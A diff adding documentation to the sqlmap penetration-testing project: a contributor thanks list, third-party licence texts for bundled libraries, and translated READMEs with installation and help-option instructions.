+dragoun dash, <dragoun.dash(at)gmail.com>
+* for reporting a minor bug
+
+flsf, <jianmaflsf@gmail.com>
+* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py
+* for contributing a minor patch
+
+fufuh, <fufuh(at)users.sourceforge.net>
+* for reporting a bug when running on Windows
+
+Hans Wurst, <wurstwass0r(at)googlemail.com>
+* for reporting a couple of bugs
+
+Hysia, <hysia(at)huorui.net>
+* for contributing a Chinese translation of README.md
+
+james, <james(at)ev6.net>
+* for reporting a bug
+
+Joe "Pragmatk", <pragmatk(at)gmail.com>
+* for reporting a few bugs
+
+John Smith, <tixos(at)live.com>
+* for reporting several bugs
+* for suggesting some features
+
+m4l1c3, <malice.anon(at)gmail.com>
+* for reporting considerable amount of bugs
+
+mariano, <marianoso(at)gmail.com>
+* for reporting a bug
+
+mitchell, <mitchell(at)tufala.net>
+* for reporting a few bugs
+
+Nadzree, <nadzree(at)bake180.com>
+* for reporting a minor bug
+
+nightman, <nightman(at)email.de>
+* for reporting considerable amount of bugs
+
+Oso Dog osodog123(at)yahoo.com
+* for reporting a minor bug
+
+pacman730, <pacman730(at)users.sourceforge.net>
+* for reporting a bug
+
+pentestmonkey, <pentestmonkey(at)pentestmonkey.net>
+* for reporting several bugs
+* for suggesting a few minor enhancements
+
+Phat R., <phatthanaphol(at)gmail.com>
+* for reporting a few bugs
+
+Phil P, <(at)superevr>
+* for suggesting a minor enhancement
+
+ragos, <ragos(at)joker.ms>
+* for reporting a minor bug
+
+rmillet, <rmillet42(at)gmail.com>
+* for reporting a bug
+
+Rub3nCT, <rub3nct(at)gmail.com>
+* for reporting a minor bug
+
+shiftzwei, <shiftzwei(at)gmail.com>
+* for reporting a couple of bugs
+
+smith, <esmyl911(at)gmail.com>
+* for reporting a minor bug
+
+Soma Cruz, <oleg.kupreev(at)gmail.com>
+* for reporting a minor bug
+
+Spiros94, <cont(at)eyrhka.gr>
+* for contributing a Greek translation of README.md
+
+Stuffe, <stuffe.dk(at)gmail.com>
+* for reporting a minor bug and a feature request
+
+Sylphid, <sylphid.su(at)sti.com.tw>
+* for suggesting some features
+
+syssecurity.info, <syssecurity7(at)googlemail.com>
+* for reporting a minor bug
+
+This LittlePiggy, <thislittlepiggyhadroastbeef(at)hotmail.com>
+* for reporting a minor bug
+
+ToR, <sstidus(at)email.it>
+* for reporting considerable amount of bugs
+* for suggesting a feature
+
+ultramegaman, <seclists(at)ultramegaman.com>
+* for reporting a minor bug
+
+Vinicius, <viniciusmaxdaloop(at)gmail.com>
+* for reporting a minor bug
+
+wanglei, <wanglei(at)17uxi.cn>
+* for reporting a minor bug
+
+warninggp, <warninggp(at)gmail.com>
+* for reporting a few minor bugs
+
+x, <deep_freeze(at)mail.ru>
+* for reporting a bug
+
+zhouhx, <zhouhx(at)knownsec.com>
+* for contributing a minor patch
+
+# Organizations
+
+Black Hat team, <info(at)blackhat.com>
+* for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation
+ * Homepage: http://goo.gl/BKfs7
+ * Slides: http://goo.gl/Dh65t
+ * White paper: http://goo.gl/spX3N
+
+SOURCE Conference team, <press(at)sourceconference.com>
+* for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation
+ * Homepage: http://goo.gl/IeXV4
+ * Slides: http://goo.gl/OKnfj
+
+AthCon Conference team, <cfp(at)athcon.org>
+* for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation
+ * Homepage: http://goo.gl/Fs71I
+ * Slides: http://goo.gl/QMfjO
+
+Metasploit Framework development team, <msfdev(at)metasploit.com>
+* for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server
+ * Homepage: http://www.metasploit.com
+
+OWASP Board, <info(at)owasp.org>
+* for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007
+ * Homepage: http://www.owasp.org

doc/THIRD-PARTY.md

@@ -0,0 +1,314 @@
+This file lists bundled packages and their associated licensing terms.
+
+# BSD
+
+* The Ansistrm library located under thirdparty/ansistrm/.
+  Copyright (C) 2010-2012, Vinay Sajip.
+* The Beautiful Soup library located under thirdparty/beautifulsoup/.
+  Copyright (C) 2004-2010, Leonard Richardson.
+* The ClientForm library located under thirdparty/clientform/.
+  Copyright (C) 2002-2007, John J. Lee.
+  Copyright (C) 2005, Gary Poster.
+  Copyright (C) 2005, Zope Corporation.
+  Copyright (C) 1998-2000, Gisle Aas.
+* The Colorama library located under thirdparty/colorama/.
+  Copyright (C) 2013, Jonathan Hartley.
+* The Fcrypt library located under thirdparty/fcrypt/.
+  Copyright (C) 2000, 2001, 2004 Carey Evans.
+* The Odict library located under thirdparty/odict/.
+  Copyright (C) 2005, Nicola Larosa, Michael Foord.
+* The Oset library located under thirdparty/oset/.
+  Copyright (C) 2010, BlueDynamics Alliance, Austria.
+  Copyright (C) 2009, Raymond Hettinger, and others.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+  Copyright (C) 2010, Chris Hall.
+* The SocksiPy library located under thirdparty/socks/.
+  Copyright (C) 2006, Dan-Haim.
+
+````
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+     - Redistributions of source code must retain the above copyright
+      notice, this list of conditions and the following disclaimer.
+     - Redistributions in binary form must reproduce the above copyright
+      notice, this list of conditions and the following disclaimer in the
+      documentation and/or other materials provided with the distribution.
+     - Neither the name of the <organization> nor the
+      names of its contributors may be used to endorse or promote products
+      derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
+DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+````
+
+# LGPL
+
+* The Chardet library located under thirdparty/chardet/.
+  Copyright (C) 2008, Mark Pilgrim.
+* The Gprof2dot library located under thirdparty/gprof2dot/.
+  Copyright (C) 2008-2009, Jose Fonseca.
+* The KeepAlive library located under thirdparty/keepalive/.
+  Copyright (C) 2002-2003, Michael D. Stenner.
+* The MultipartPost library located under thirdparty/multipart/.
+  Copyright (C) 2006, Will Holcomb.
+* The XDot library located under thirdparty/xdot/.
+  Copyright (C) 2008, Jose Fonseca.
+* The icmpsh tool located under extra/icmpsh/.
+  Copyright (C) 2010, Nico Leidecker, Bernardo Damele.
+
+````
+                   GNU LESSER GENERAL PUBLIC LICENSE
+                       Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+
+  This version of the GNU Lesser General Public License incorporates
+the terms and conditions of version 3 of the GNU General Public
+License, supplemented by the additional permissions listed below.
+
+  0. Additional Definitions.
+
+  As used herein, "this License" refers to version 3 of the GNU Lesser
+General Public License, and the "GNU GPL" refers to version 3 of the GNU
+General Public License.
+
+  "The Library" refers to a covered work governed by this License,
+other than an Application or a Combined Work as defined below.
+
+  An "Application" is any work that makes use of an interface provided
+by the Library, but which is not otherwise based on the Library.
+Defining a subclass of a class defined by the Library is deemed a mode
+of using an interface provided by the Library.
+
+  A "Combined Work" is a work produced by combining or linking an
+Application with the Library.  The particular version of the Library
+with which the Combined Work was made is also called the "Linked
+Version".
+
+  The "Minimal Corresponding Source" for a Combined Work means the
+Corresponding Source for the Combined Work, excluding any source code
+for portions of the Combined Work that, considered in isolation, are
+based on the Application, and not on the Linked Version.
+
+  The "Corresponding Application Code" for a Combined Work means the
+object code and/or source code for the Application, including any data
+and utility programs needed for reproducing the Combined Work from the
+Application, but excluding the System Libraries of the Combined Work.
+
+  1. Exception to Section 3 of the GNU GPL.
+
+  You may convey a covered work under sections 3 and 4 of this License
+without being bound by section 3 of the GNU GPL.
+
+  2. Conveying Modified Versions.
+
+  If you modify a copy of the Library, and, in your modifications, a
+facility refers to a function or data to be supplied by an Application
+that uses the facility (other than as an argument passed when the
+facility is invoked), then you may convey a copy of the modified
+version:
+
+   a) under this License, provided that you make a good faith effort to
+   ensure that, in the event an Application does not supply the
+   function or data, the facility still operates, and performs
+   whatever part of its purpose remains meaningful, or
+
+   b) under the GNU GPL, with none of the additional permissions of
+   this License applicable to that copy.
+
+  3. Object Code Incorporating Material from Library Header Files.
+
+  The object code form of an Application may incorporate material from
+a header file that is part of the Library.  You may convey such object
+code under terms of your choice, provided that, if the incorporated
+material is not limited to numerical parameters, data structure
+layouts and accessors, or small macros, inline functions and templates
+(ten or fewer lines in length), you do both of the following:
+
+   a) Give prominent notice with each copy of the object code that the
+   Library is used in it and that the Library and its use are
+   covered by this License.
+
+   b) Accompany the object code with a copy of the GNU GPL and this license
+   document.
+
+  4. Combined Works.
+
+  You may convey a Combined Work under terms of your choice that,
+taken together, effectively do not restrict modification of the
+portions of the Library contained in the Combined Work and reverse
+engineering for debugging such modifications, if you also do each of
+the following:
+
+   a) Give prominent notice with each copy of the Combined Work that
+   the Library is used in it and that the Library and its use are
+   covered by this License.
+
+   b) Accompany the Combined Work with a copy of the GNU GPL and this license
+   document.
+
+   c) For a Combined Work that displays copyright notices during
+   execution, include the copyright notice for the Library among
+   these notices, as well as a reference directing the user to the
+   copies of the GNU GPL and this license document.
+
+   d) Do one of the following:
+
+       0) Convey the Minimal Corresponding Source under the terms of this
+       License, and the Corresponding Application Code in a form
+       suitable for, and under terms that permit, the user to
+       recombine or relink the Application with a modified version of
+       the Linked Version to produce a modified Combined Work, in the
+       manner specified by section 6 of the GNU GPL for conveying
+       Corresponding Source.
+
+       1) Use a suitable shared library mechanism for linking with the
+       Library.  A suitable mechanism is one that (a) uses at run time
+       a copy of the Library already present on the user's computer
+       system, and (b) will operate properly with a modified version
+       of the Library that is interface-compatible with the Linked
+       Version.
+
+   e) Provide Installation Information, but only if you would otherwise
+   be required to provide such information under section 6 of the
+   GNU GPL, and only to the extent that such information is
+   necessary to install and execute a modified version of the
+   Combined Work produced by recombining or relinking the
+   Application with a modified version of the Linked Version. (If
+   you use option 4d0, the Installation Information must accompany
+   the Minimal Corresponding Source and Corresponding Application
+   Code. If you use option 4d1, you must provide the Installation
+   Information in the manner specified by section 6 of the GNU GPL
+   for conveying Corresponding Source.)
+
+  5. Combined Libraries.
+
+  You may place library facilities that are a work based on the
+Library side by side in a single library together with other library
+facilities that are not Applications and are not covered by this
+License, and convey such a combined library under terms of your
+choice, if you do both of the following:
+
+   a) Accompany the combined library with a copy of the same work based
+   on the Library, uncombined with any other library facilities,
+   conveyed under the terms of this License.
+
+   b) Give prominent notice with the combined library that part of it
+   is a work based on the Library, and explaining where to find the
+   accompanying uncombined form of the same work.
+
+  6. Revised Versions of the GNU Lesser General Public License.
+
+  The Free Software Foundation may publish revised and/or new versions
+of the GNU Lesser General Public License from time to time. Such new
+versions will be similar in spirit to the present version, but may
+differ in detail to address new problems or concerns.
+
+  Each version is given a distinguishing version number. If the
+Library as you received it specifies that a certain numbered version
+of the GNU Lesser General Public License "or any later version"
+applies to it, you have the option of following the terms and
+conditions either of that published version or of any later version
+published by the Free Software Foundation. If the Library as you
+received it does not specify a version number of the GNU Lesser
+General Public License, you may choose any version of the GNU Lesser
+General Public License ever published by the Free Software Foundation.
+
+  If the Library as you received it specifies that a proxy can decide
+whether future versions of the GNU Lesser General Public License shall
+apply, that proxy's public statement of acceptance of any version is
+permanent authorization for you to choose that version for the
+Library.
+````
+
+# PSF
+
+* The Magic library located under thirdparty/magic/.
+  Copyright (C) 2011, Adam Hupp.
+
+````
+PSF LICENSE AGREEMENT FOR PYTHON 2.7.3
+
+This LICENSE AGREEMENT is between the Python Software Foundation (“PSF”),
+and the Individual or Organization (“Licensee”) accessing and otherwise
+using Python 2.7.3 software in source or binary form and its associated
+documentation.
+Subject to the terms and conditions of this License Agreement, PSF hereby
+grants Licensee a nonexclusive, royalty-free, world-wide license to
+reproduce, analyze, test, perform and/or display publicly, prepare
+derivative works, distribute, and otherwise use Python 2.7.3 alone or in any
+derivative version, provided, however, that PSF’s License Agreement and
+PSF’s notice of copyright, i.e., “Copyright © 2001-2012 Python Software
+Foundation; All Rights Reserved” are retained in Python 2.7.3 alone or in
+any derivative version prepared by Licensee.
+In the event Licensee prepares a derivative work that is based on or
+incorporates Python 2.7.3 or any part thereof, and wants to make the
+derivative work available to others as provided herein, then Licensee hereby
+agrees to include in any such work a brief summary of the changes made to
+Python 2.7.3.
+PSF is making Python 2.7.3 available to Licensee on an “AS IS” basis. PSF
+MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF
+EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION
+OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT
+THE USE OF PYTHON 2.7.3 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
+PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.3 FOR
+ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF
+MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.3, OR ANY DERIVATIVE
+THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
+This License Agreement will automatically terminate upon a material breach
+of its terms and conditions.
+Nothing in this License Agreement shall be deemed to create any relationship
+of agency, partnership, or joint venture between PSF and Licensee. This
+License Agreement does not grant permission to use PSF trademarks or trade
+name in a trademark sense to endorse or promote products or services of
+Licensee, or any third party.
+By copying, installing or otherwise using Python 2.7.3, Licensee agrees to
+be bound by the terms and conditions of this License Agreement.
+````
+
+# MIT
+
+* The bottle web framework library located under thirdparty/bottle/.
+  Copyright (C) 2012, Marcel Hellkamp.
+* The PageRank library located under thirdparty/pagerank/.
+  Copyright (C) 2010, Corey Goldberg.
+* The Termcolor library located under thirdparty/termcolor/.
+  Copyright (C) 2008-2011, Volvox Development Team.
+
+````
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+````
+
+# Public domain
+
+* The PyDes library located under thirdparty/pydes/.
+   Copyleft 2009, Todd Whiteman.

doc/translations/README-es-MX.md

@@ -0,0 +1,52 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
+
+Capturas de Pantalla
+---
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki).
+
+Instalación
+---
+
+Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma.
+
+Uso
+---
+
+Para obtener una lista de opciones básicas: 
+
+    python sqlmap.py -h 
+
+Para obtener una lista de todas las opciones:
+
+    python sqlmap.py -hh
+
+Se puede encontrar una muestra de su funcionamiento [aquí](https://gist.github.com/stamparm/5335217).
+Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Enlaces
+---
+
+* Página principal: http://sqlmap.org 
+* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues
+* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki
+* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Subscripción a la lista de correo: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* Fuente de la lista de correo "RSS feed": http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Archivos de lista de correo: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-gr-GR.md

@@ -0,0 +1,53 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
+
+Εικόνες
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
+
+Εγκατάσταση
+----
+
+Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
+
+Χρήση
+----
+
+Για να δείτε μια βασική λίστα από επιλογές πατήστε:
+
+    python sqlmap.py -h
+
+Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
+
+    python sqlmap.py -hh
+
+Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
+Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Σύνδεσμοι
+----
+
+* Αρχική σελίδα: http://sqlmap.org
+* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
+* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
+* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-hr-HR.md

@@ -0,0 +1,53 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
+
+Slike zaslona
+----
+
+![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
+
+Instalacija
+----
+
+Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
+
+Korištenje
+----
+
+Kako biste dobili listu osnovnih opcija i prekidača koristite:
+
+    python sqlmap.py -h
+
+Kako biste dobili listu svih opcija i prekidača koristite:
+
+    python sqlmap.py -hh
+
+Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
+Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Poveznice
+----
+
+* Početna stranica: http://sqlmap.org
+* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
+* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
+* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-id-ID.md

@@ -0,0 +1,54 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. 
+
+Tangkapan Layar
+----
+
+![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
+
+Instalasi
+----
+
+Anda dapat mengunduh tarball versi terbaru [di sini]
+(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun.
+
+Penggunaan
+----
+
+Untuk mendapatkan daftar opsi dasar gunakan:
+
+    python sqlmap.py -h
+
+Untuk mendapatkan daftar opsi lanjut gunakan:
+
+    python sqlmap.py -hh
+
+Anda dapat mendapatkan contoh penggunaan [di sini](https://gist.github.com/stamparm/5335217).
+Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Tautan
+----
+
+* Situs: http://sqlmap.org
+* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
